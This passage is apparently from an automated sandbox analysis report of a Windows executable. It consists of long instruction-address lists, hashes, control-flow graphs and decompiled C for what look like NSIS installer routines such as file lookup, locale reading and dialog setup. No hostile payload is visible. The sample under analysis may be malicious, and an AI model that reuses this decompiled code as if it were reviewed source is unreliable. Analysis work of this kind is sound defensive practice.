                                                                  							goto L170;
                                                                  					}
                                                                  				}
                                                                  			}













                                                                  0x00000000
                                                                  0x00406333
                                                                  0x00406333
                                                                  0x00406338
                                                                  0x004063af
                                                                  0x004063b6
                                                                  0x004063c0
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x004069a2
                                                                  0x004069a2
                                                                  0x004069a8
                                                                  0x004069ae
                                                                  0x004069b4
                                                                  0x004069ce
                                                                  0x004069d1
                                                                  0x004069d7
                                                                  0x004069e2
                                                                  0x004069e4
                                                                  0x004069b6
                                                                  0x004069b6
                                                                  0x004069c5
                                                                  0x004069c9
                                                                  0x004069c9
                                                                  0x004069ee
                                                                  0x00406a15
                                                                  0x00406a15
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00000000
                                                                  0x004069f0
                                                                  0x004069f0
                                                                  0x004069f4
                                                                  0x00406ba3
                                                                  0x00000000
                                                                  0x00406ba3
                                                                  0x00406a00
                                                                  0x00406a07
                                                                  0x00406a0f
                                                                  0x00406a12
                                                                  0x00000000
                                                                  0x00406a12
                                                                  0x0040633a
                                                                  0x0040633a
                                                                  0x0040633e
                                                                  0x00406346
                                                                  0x00406349
                                                                  0x0040634b
                                                                  0x0040634e
                                                                  0x00406350
                                                                  0x00406355
                                                                  0x00406358
                                                                  0x0040635f
                                                                  0x00406366
                                                                  0x00406369
                                                                  0x00406374
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x00406383
                                                                  0x004063a1
                                                                  0x004063a3
                                                                  0x00406576
                                                                  0x00406576
                                                                  0x00406579
                                                                  0x0040657c
                                                                  0x0040657f
                                                                  0x00406582
                                                                  0x00406585
                                                                  0x00406588
                                                                  0x0040658b
                                                                  0x0040658e
                                                                  0x00406594
                                                                  0x004065ac
                                                                  0x004065af
                                                                  0x004065b2
                                                                  0x004065b5
                                                                  0x004065b5
                                                                  0x004065b8
                                                                  0x004065be
                                                                  0x00406596
                                                                  0x00406596
                                                                  0x0040659e
                                                                  0x004065a3
                                                                  0x004065a5
                                                                  0x004065a7
                                                                  0x004065a7
                                                                  0x004065c8
                                                                  0x004065cb
                                                                  0x0040656e
                                                                  0x00406574
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00406549
                                                                  0x0040654d
                                                                  0x00406b55
                                                                  0x00000000
                                                                  0x00406b55
                                                                  0x00406553
                                                                  0x00406556
                                                                  0x00406559
                                                                  0x0040655d
                                                                  0x00406560
                                                                  0x00406566
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x0040656b
                                                                  0x00000000
                                                                  0x0040656b
                                                                  0x00406385
                                                                  0x00406385
                                                                  0x00406388
                                                                  0x0040638e
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406393
                                                                  0x00406396
                                                                  0x00406398
                                                                  0x00406399
                                                                  0x0040639c
                                                                  0x00406409
                                                                  0x00406409
                                                                  0x0040640d
                                                                  0x00406410
                                                                  0x00406413
                                                                  0x00406416
                                                                  0x00406419
                                                                  0x0040641a
                                                                  0x0040641d
                                                                  0x0040641f
                                                                  0x00406425
                                                                  0x00406428
                                                                  0x0040642b
                                                                  0x0040642e
                                                                  0x00406431
                                                                  0x00406437
                                                                  0x00406453
                                                                  0x00406456
                                                                  0x00406459
                                                                  0x0040645c
                                                                  0x00406463
                                                                  0x00406469
                                                                  0x0040646d
                                                                  0x00406439
                                                                  0x00406439
                                                                  0x0040643d
                                                                  0x00406445
                                                                  0x0040644a
                                                                  0x0040644c
                                                                  0x0040644e
                                                                  0x0040644e
                                                                  0x00406477
                                                                  0x0040647a
                                                                  0x004063f1
                                                                  0x004063f1
                                                                  0x004063f7
                                                                  0x004064aa
                                                                  0x004064b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004064b2
                                                                  0x004064b5
                                                                  0x004064b8
                                                                  0x004064bb
                                                                  0x004064be
                                                                  0x004064c1
                                                                  0x004064c4
                                                                  0x004064c7
                                                                  0x004064ca
                                                                  0x004064d0
                                                                  0x004064e8
                                                                  0x004064eb
                                                                  0x004064ee
                                                                  0x004064f1
                                                                  0x004064f1
                                                                  0x004064f4
                                                                  0x004064fa
                                                                  0x004064d2
                                                                  0x004064d2
                                                                  0x004064da
                                                                  0x004064df
                                                                  0x004064e1
                                                                  0x004064e3
                                                                  0x004064e3
                                                                  0x00406504
                                                                  0x00406507
                                                                  0x00406485
                                                                  0x00406489
                                                                  0x00406b49
                                                                  0x00000000
                                                                  0x00406b49
                                                                  0x0040648f
                                                                  0x00406492
                                                                  0x00406495
                                                                  0x00406499
                                                                  0x0040649c
                                                                  0x004064a2
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a7
                                                                  0x004064a7
                                                                  0x00406507
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x00406512
                                                                  0x00406512
                                                                  0x00406515
                                                                  0x00406518
                                                                  0x0040651c
                                                                  0x00406b61
                                                                  0x00000000
                                                                  0x00406b61
                                                                  0x00406522
                                                                  0x00406525
                                                                  0x00406528
                                                                  0x0040652b
                                                                  0x0040652e
                                                                  0x00406531
                                                                  0x00406534
                                                                  0x00406536
                                                                  0x00406539
                                                                  0x0040653c
                                                                  0x0040653f
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x004066de
                                                                  0x004066de
                                                                  0x004066e1
                                                                  0x004066e1
                                                                  0x00000000
                                                                  0x004066e1
                                                                  0x00406403
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x004063cc
                                                                  0x004063d0
                                                                  0x00406b3d
                                                                  0x00406bb9
                                                                  0x00406bc1
                                                                  0x00406bc8
                                                                  0x00406bca
                                                                  0x00406bd1
                                                                  0x00406bd5
                                                                  0x00406bd5
                                                                  0x004063d6
                                                                  0x004063d9
                                                                  0x004063dc
                                                                  0x004063e0
                                                                  0x004063e3
                                                                  0x004063e9
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063ee
                                                                  0x00000000
                                                                  0x004063ee
                                                                  0x0040647a
                                                                  0x00406383
                                                                  0x004061b7
                                                                  0x004061b7
                                                                  0x004061c0
                                                                  0x00406bce
                                                                  0x00406bce
                                                                  0x00000000
                                                                  0x00406bce
                                                                  0x004061c6
                                                                  0x00000000
                                                                  0x004061d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061da
                                                                  0x004061dd
                                                                  0x004061e0
                                                                  0x004061e4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061ea
                                                                  0x004061ed
                                                                  0x004061ef
                                                                  0x004061f0
                                                                  0x004061f3
                                                                  0x004061f5
                                                                  0x004061f6
                                                                  0x004061f8
                                                                  0x004061fb
                                                                  0x00406200
                                                                  0x00406205
                                                                  0x0040620e
                                                                  0x00406221
                                                                  0x00406224
                                                                  0x00406230
                                                                  0x00406258
                                                                  0x0040625a
                                                                  0x00406268
                                                                  0x00406268
                                                                  0x0040626c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x0040625c
                                                                  0x0040625f
                                                                  0x00406260
                                                                  0x00406260
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x00406236
                                                                  0x0040623b
                                                                  0x0040623b
                                                                  0x00406244
                                                                  0x0040624c
                                                                  0x0040624f
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406272
                                                                  0x00406272
                                                                  0x00406276
                                                                  0x00406b22
                                                                  0x00000000
                                                                  0x00406b22
                                                                  0x0040627f
                                                                  0x0040628f
                                                                  0x00406292
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406298
                                                                  0x0040629c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040629e
                                                                  0x004062a4
                                                                  0x004062ce
                                                                  0x004062d4
                                                                  0x004062db
                                                                  0x00000000
                                                                  0x004062db
                                                                  0x004062aa
                                                                  0x004062ad
                                                                  0x004062b2
                                                                  0x004062b2
                                                                  0x004062bd
                                                                  0x004062c5
                                                                  0x004062c8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040630d
                                                                  0x00406313
                                                                  0x00406316
                                                                  0x00406323
                                                                  0x0040632b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004062e2
                                                                  0x004062e2
                                                                  0x004062e6
                                                                  0x00406b31
                                                                  0x00000000
                                                                  0x00406b31
                                                                  0x004062f2
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x00406300
                                                                  0x00406303
                                                                  0x00406306
                                                                  0x0040630b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004065d2
                                                                  0x004065d6
                                                                  0x004065f4
                                                                  0x004065f7
                                                                  0x004065fe
                                                                  0x00406601
                                                                  0x00406604
                                                                  0x00406607
                                                                  0x0040660a
                                                                  0x0040660d
                                                                  0x0040660f
                                                                  0x00406616
                                                                  0x00406617
                                                                  0x00406619
                                                                  0x0040661c
                                                                  0x0040661f
                                                                  0x00406622
                                                                  0x00406622
                                                                  0x00406627
                                                                  0x00000000
                                                                  0x00406627
                                                                  0x004065d8
                                                                  0x004065db
                                                                  0x004065de
                                                                  0x004065e8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040663c
                                                                  0x00406640
                                                                  0x00406663
                                                                  0x00406666
                                                                  0x00406669
                                                                  0x00406673
                                                                  0x00406642
                                                                  0x00406642
                                                                  0x00406645
                                                                  0x00406648
                                                                  0x0040664b
                                                                  0x00406658
                                                                  0x0040665b
                                                                  0x0040665b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040667f
                                                                  0x00406683
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406689
                                                                  0x0040668d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406693
                                                                  0x00406695
                                                                  0x00406699
                                                                  0x00406699
                                                                  0x0040669c
                                                                  0x004066a0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066f0
                                                                  0x004066f4
                                                                  0x004066fb
                                                                  0x004066fe
                                                                  0x00406701
                                                                  0x0040670b
                                                                  0x00000000
                                                                  0x0040670b
                                                                  0x004066f6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406717
                                                                  0x0040671b
                                                                  0x00406722
                                                                  0x00406725
                                                                  0x00406728
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040672b
                                                                  0x0040672e
                                                                  0x00406731
                                                                  0x00406731
                                                                  0x00406734
                                                                  0x00406737
                                                                  0x0040673a
                                                                  0x0040673a
                                                                  0x0040673d
                                                                  0x00406744
                                                                  0x00406749
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004067d7
                                                                  0x004067d7
                                                                  0x004067db
                                                                  0x00406b79
                                                                  0x00000000
                                                                  0x00406b79
                                                                  0x004067e1
                                                                  0x004067e4
                                                                  0x004067e7
                                                                  0x004067eb
                                                                  0x004067ee
                                                                  0x004067f4
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f9
                                                                  0x004067fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040685a
                                                                  0x0040685a
                                                                  0x0040685e
                                                                  0x00406b85
                                                                  0x00000000
                                                                  0x00406b85
                                                                  0x00406864
                                                                  0x00406867
                                                                  0x0040686a
                                                                  0x0040686e
                                                                  0x00406871
                                                                  0x00406877
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x0040687c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040662a
                                                                  0x0040662a
                                                                  0x0040662d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406969
                                                                  0x0040696d
                                                                  0x0040698f
                                                                  0x00406992
                                                                  0x0040699c
                                                                  0x00000000
                                                                  0x0040699c
                                                                  0x0040696f
                                                                  0x00406972
                                                                  0x00406976
                                                                  0x00406979
                                                                  0x00406979
                                                                  0x0040697c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a26
                                                                  0x00406a2a
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a4f
                                                                  0x00406a56
                                                                  0x00406a5d
                                                                  0x00406a5d
                                                                  0x00000000
                                                                  0x00406a5d
                                                                  0x00406a2c
                                                                  0x00406a2f
                                                                  0x00406a32
                                                                  0x00406a35
                                                                  0x00406a3c
                                                                  0x00406980
                                                                  0x00406980
                                                                  0x00406983
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406b17
                                                                  0x00406b1a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406751
                                                                  0x00406753
                                                                  0x0040675a
                                                                  0x0040675b
                                                                  0x0040675d
                                                                  0x00406760
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406768
                                                                  0x0040676b
                                                                  0x0040676e
                                                                  0x00406770
                                                                  0x00406772
                                                                  0x00406772
                                                                  0x00406773
                                                                  0x00406776
                                                                  0x0040677d
                                                                  0x00406780
                                                                  0x0040678e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a64
                                                                  0x00406a64
                                                                  0x00406a67
                                                                  0x00406a6e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a73
                                                                  0x00406a73
                                                                  0x00406a77
                                                                  0x00406baf
                                                                  0x00000000
                                                                  0x00406baf
                                                                  0x00406a7d
                                                                  0x00406a80
                                                                  0x00406a83
                                                                  0x00406a87
                                                                  0x00406a8a
                                                                  0x00406a90
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a95
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a9b
                                                                  0x00406a9b
                                                                  0x00406a9f
                                                                  0x00406aff
                                                                  0x00406b02
                                                                  0x00406b07
                                                                  0x00406b08
                                                                  0x00406b0a
                                                                  0x00406b0c
                                                                  0x00406b0f
                                                                  0x00000000
                                                                  0x00406b0f
                                                                  0x00406aa1
                                                                  0x00406aa7
                                                                  0x00406aaa
                                                                  0x00406aad
                                                                  0x00406ab0
                                                                  0x00406ab3
                                                                  0x00406ab6
                                                                  0x00406ab9
                                                                  0x00406abc
                                                                  0x00406abf
                                                                  0x00406ac2
                                                                  0x00406adb
                                                                  0x00406ade
                                                                  0x00406ae1
                                                                  0x00406ae4
                                                                  0x00406ae8
                                                                  0x00406aea
                                                                  0x00406aea
                                                                  0x00406aeb
                                                                  0x00406aee
                                                                  0x00406ac4
                                                                  0x00406ac4
                                                                  0x00406acc
                                                                  0x00406ad1
                                                                  0x00406ad3
                                                                  0x00406ad6
                                                                  0x00406ad6
                                                                  0x00406af1
                                                                  0x00406af8
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406796
                                                                  0x00406799
                                                                  0x004067cf
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x00406902
                                                                  0x00406902
                                                                  0x00406905
                                                                  0x00406907
                                                                  0x00406b91
                                                                  0x00000000
                                                                  0x00406b91
                                                                  0x0040690d
                                                                  0x00406910
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406916
                                                                  0x0040691a
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x00000000
                                                                  0x0040691d
                                                                  0x0040679b
                                                                  0x0040679d
                                                                  0x0040679f
                                                                  0x004067a1
                                                                  0x004067a4
                                                                  0x004067a5
                                                                  0x004067a7
                                                                  0x004067a9
                                                                  0x004067ac
                                                                  0x004067af
                                                                  0x004067c5
                                                                  0x004067ca
                                                                  0x00406802
                                                                  0x00406802
                                                                  0x00406806
                                                                  0x00406832
                                                                  0x00406834
                                                                  0x0040683b
                                                                  0x0040683e
                                                                  0x00406841
                                                                  0x00406841
                                                                  0x00406846
                                                                  0x00406846
                                                                  0x00406848
                                                                  0x0040684b
                                                                  0x00406852
                                                                  0x00406855
                                                                  0x00406882
                                                                  0x00406882
                                                                  0x00406885
                                                                  0x00406888
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x00000000
                                                                  0x004068fc
                                                                  0x0040688a
                                                                  0x00406890
                                                                  0x00406893
                                                                  0x00406896
                                                                  0x00406899
                                                                  0x0040689c
                                                                  0x0040689f
                                                                  0x004068a2
                                                                  0x004068a5
                                                                  0x004068a8
                                                                  0x004068ab
                                                                  0x004068c4
                                                                  0x004068c6
                                                                  0x004068c9
                                                                  0x004068ca
                                                                  0x004068cd
                                                                  0x004068cf
                                                                  0x004068d2
                                                                  0x004068d4
                                                                  0x004068d6
                                                                  0x004068d9
                                                                  0x004068db
                                                                  0x004068de
                                                                  0x004068e2
                                                                  0x004068e4
                                                                  0x004068e4
                                                                  0x004068e5
                                                                  0x004068e8
                                                                  0x004068eb
                                                                  0x004068ad
                                                                  0x004068ad
                                                                  0x004068b5
                                                                  0x004068ba
                                                                  0x004068bc
                                                                  0x004068bf
                                                                  0x004068bf
                                                                  0x004068ee
                                                                  0x004068f5
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x004068f5
                                                                  0x00406808
                                                                  0x0040680b
                                                                  0x0040680d
                                                                  0x00406810
                                                                  0x00406813
                                                                  0x00406816
                                                                  0x00406818
                                                                  0x0040681b
                                                                  0x0040681e
                                                                  0x0040681e
                                                                  0x00406821
                                                                  0x00406821
                                                                  0x00406824
                                                                  0x0040682b
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x0040682b
                                                                  0x004067b1
                                                                  0x004067b4
                                                                  0x004067b6
                                                                  0x004067b9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066a3
                                                                  0x004066a3
                                                                  0x004066a7
                                                                  0x00406b6d
                                                                  0x00000000
                                                                  0x00406b6d
                                                                  0x004066ad
                                                                  0x004066b0
                                                                  0x004066b3
                                                                  0x004066b6
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066bb
                                                                  0x004066be
                                                                  0x004066c1
                                                                  0x004066c4
                                                                  0x004066c7
                                                                  0x004066ca
                                                                  0x004066cb
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066d0
                                                                  0x004066d3
                                                                  0x004066d6
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066dc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406924
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040692a
                                                                  0x0040692d
                                                                  0x00406930
                                                                  0x00406933
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406938
                                                                  0x0040693b
                                                                  0x0040693e
                                                                  0x00406941
                                                                  0x00406944
                                                                  0x00406947
                                                                  0x00406948
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694d
                                                                  0x00406950
                                                                  0x00406953
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695d
                                                                  0x0040695f
                                                                  0x00406962
                                                                  0x00000000
                                                                  0x00406964
                                                                  0x00000000
                                                                  0x00406964
                                                                  0x00406962
                                                                  0x00406b97
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                                                                  • Instruction ID: bdeebfab4b2853dd6ba105009d9d55a4887b03880c8adf7539db3398297304ab
                                                                  • Opcode Fuzzy Hash: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                                                                  • Instruction Fuzzy Hash: 61F16871D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 668 405ff6-40600a FindFirstFileA 669 406017 668->669 670 40600c-406015 FindClose 668->670 671 406019-40601a 669->671 670->671
                                                                  C-Code - Quality: 100%
                                                                  			E00405FF6(CHAR* _a4) {
                                                                  				void* _t2;
                                                                  
                                                                  				_t2 = FindFirstFileA(_a4, 0x4225d0); // executed
                                                                  				if(_t2 == 0xffffffff) {
                                                                  					return 0;
                                                                  				}
                                                                  				FindClose(_t2);
                                                                  				return 0x4225d0;
                                                                  			}




                                                                  0x00406001
                                                                  0x0040600a
                                                                  0x00000000
                                                                  0x00406017
                                                                  0x0040600d
                                                                  0x00000000

                                                                  APIs
                                                                  • FindFirstFileA.KERNELBASE(?,004225D0,C:\,00405912,C:\,C:\,00000000,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00406001
                                                                  • FindClose.KERNEL32(00000000), ref: 0040600D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: C:\
                                                                  • API String ID: 2295610775-3404278061
                                                                  • Opcode ID: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                                                                  • Instruction ID: bebaf1ec17e03c7be3b4f7568d9df3fae16269376aceebcceaf96dbad000be3e
                                                                  • Opcode Fuzzy Hash: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                                                                  • Instruction Fuzzy Hash: 20D012719480206BC3105B387D0C85B7A589F89330711CA33F566FA2E0D7749CB2AAED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 134 40374e-403766 call 406087 137 403768-403778 call 405c59 134->137 138 40377a-4037a1 call 405be2 134->138 147 4037c4-4037ed call 403a17 call 4058cf 137->147 143 4037a3-4037b4 call 405be2 138->143 144 4037b9-4037bf lstrcatA 138->144 143->144 144->147 152 4037f3-4037f8 147->152 153 403874-40387c call 4058cf 147->153 152->153 154 4037fa-40381e call 405be2 152->154 159 40388a-4038af LoadImageA 153->159 160 40387e-403885 call 405d1d 153->160 154->153 161 403820-403822 154->161 163 4038b5-4038eb RegisterClassA 159->163 164 40393e-403946 call 40140b 159->164 160->159 165 403833-40383f lstrlenA 161->165 166 403824-403831 call 405819 161->166 167 4038f1-403939 SystemParametersInfoA CreateWindowExA 163->167 168 403a0d 163->168 177 403950-40395b call 403a17 164->177 178 403948-40394b 164->178 172 403841-40384f lstrcmpiA 165->172 173 403867-40386f call 4057ee call 405cfb 165->173 166->165 167->164 171 403a0f-403a16 168->171 172->173 176 403851-40385b GetFileAttributesA 172->176 173->153 180 403861-403862 call 405835 176->180 181 40385d-40385f 176->181 187 403961-40397b ShowWindow call 40601d 177->187 188 4039e4-4039ec call 4050b9 177->188 178->171 180->173 181->173 181->180 193 403987-403999 GetClassInfoA 187->193 194 40397d-403982 call 40601d 187->194 195 403a06-403a08 call 40140b 188->195 196 4039ee-4039f4 188->196 200 4039b1-4039e2 DialogBoxParamA call 40140b call 40369e 193->200 201 40399b-4039ab GetClassInfoA RegisterClassA 193->201 194->193 195->168 196->178 197 4039fa-403a01 call 40140b 196->197 197->178 200->171 201->200
                                                                  C-Code - Quality: 96%
                                                                  			E0040374E(void* __eflags) {
                                                                  				intOrPtr _v4;
                                                                  				intOrPtr _v8;
                                                                  				int _v12;
                                                                  				int _v16;
                                                                  				char _v20;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr* _t20;
                                                                  				void* _t28;
                                                                  				void* _t30;
                                                                  				int _t31;
                                                                  				void* _t34;
                                                                  				int _t37;
                                                                  				int _t38;
                                                                  				int _t42;
                                                                  				char _t62;
                                                                  				CHAR* _t64;
                                                                  				signed char _t68;
                                                                  				CHAR* _t79;
                                                                  				intOrPtr _t81;
                                                                  				CHAR* _t85;
                                                                  
                                                                  				_t81 =  *0x423f90;
                                                                  				_t20 = E00406087(3);
                                                                  				_t88 = _t20;
                                                                  				if(_t20 == 0) {
                                                                  					_t79 = 0x420580;
                                                                  					"1033" = 0x7830;
                                                                  					E00405BE2(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420580, 0);
                                                                  					__eflags =  *0x420580;
                                                                  					if(__eflags == 0) {
                                                                  						E00405BE2(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072F6, 0x420580, 0);
                                                                  					}
                                                                  					lstrcatA("1033", _t79);
                                                                  				} else {
                                                                  					E00405C59("1033",  *_t20() & 0x0000ffff);
                                                                  				}
                                                                  				E00403A17(_t76, _t88);
                                                                  				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                                  				 *0x424000 =  *0x423f98 & 0x00000020;
                                                                  				 *0x42401c = 0x10000;
                                                                  				if(E004058CF(_t88, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                                                  					L16:
                                                                  					if(E004058CF(_t96, _t84) == 0) {
                                                                  						E00405D1D(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
                                                                  					}
                                                                  					_t28 = LoadImageA( *0x423f80, 0x67, 1, 0, 0, 0x8040); // executed
                                                                  					 *0x423768 = _t28;
                                                                  					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                                                  						L21:
                                                                  						if(E0040140B(0) == 0) {
                                                                  							_t30 = E00403A17(_t76, __eflags);
                                                                  							__eflags =  *0x424020;
                                                                  							if( *0x424020 != 0) {
                                                                  								_t31 = E004050B9(_t30, 0);
                                                                  								__eflags = _t31;
                                                                  								if(_t31 == 0) {
                                                                  									E0040140B(1);
                                                                  									goto L33;
                                                                  								}
                                                                  								__eflags =  *0x42374c;
                                                                  								if( *0x42374c == 0) {
                                                                  									E0040140B(2);
                                                                  								}
                                                                  								goto L22;
                                                                  							}
                                                                  							ShowWindow( *0x420558, 5);
                                                                  							_t37 = E0040601D("RichEd20");
                                                                  							__eflags = _t37;
                                                                  							if(_t37 == 0) {
                                                                  								E0040601D("RichEd32");
                                                                  							}
                                                                  							_t85 = "RichEdit20A";
                                                                  							_t38 = GetClassInfoA(0, _t85, 0x423720);
                                                                  							__eflags = _t38;
                                                                  							if(_t38 == 0) {
                                                                  								GetClassInfoA(0, "RichEdit", 0x423720);
                                                                  								 *0x423744 = _t85;
                                                                  								RegisterClassA(0x423720);
                                                                  							}
                                                                  							_t42 = DialogBoxParamA( *0x423f80,  *0x423760 + 0x00000069 & 0x0000ffff, 0, E00403AE4, 0);
                                                                  							E0040369E(E0040140B(5), 1);
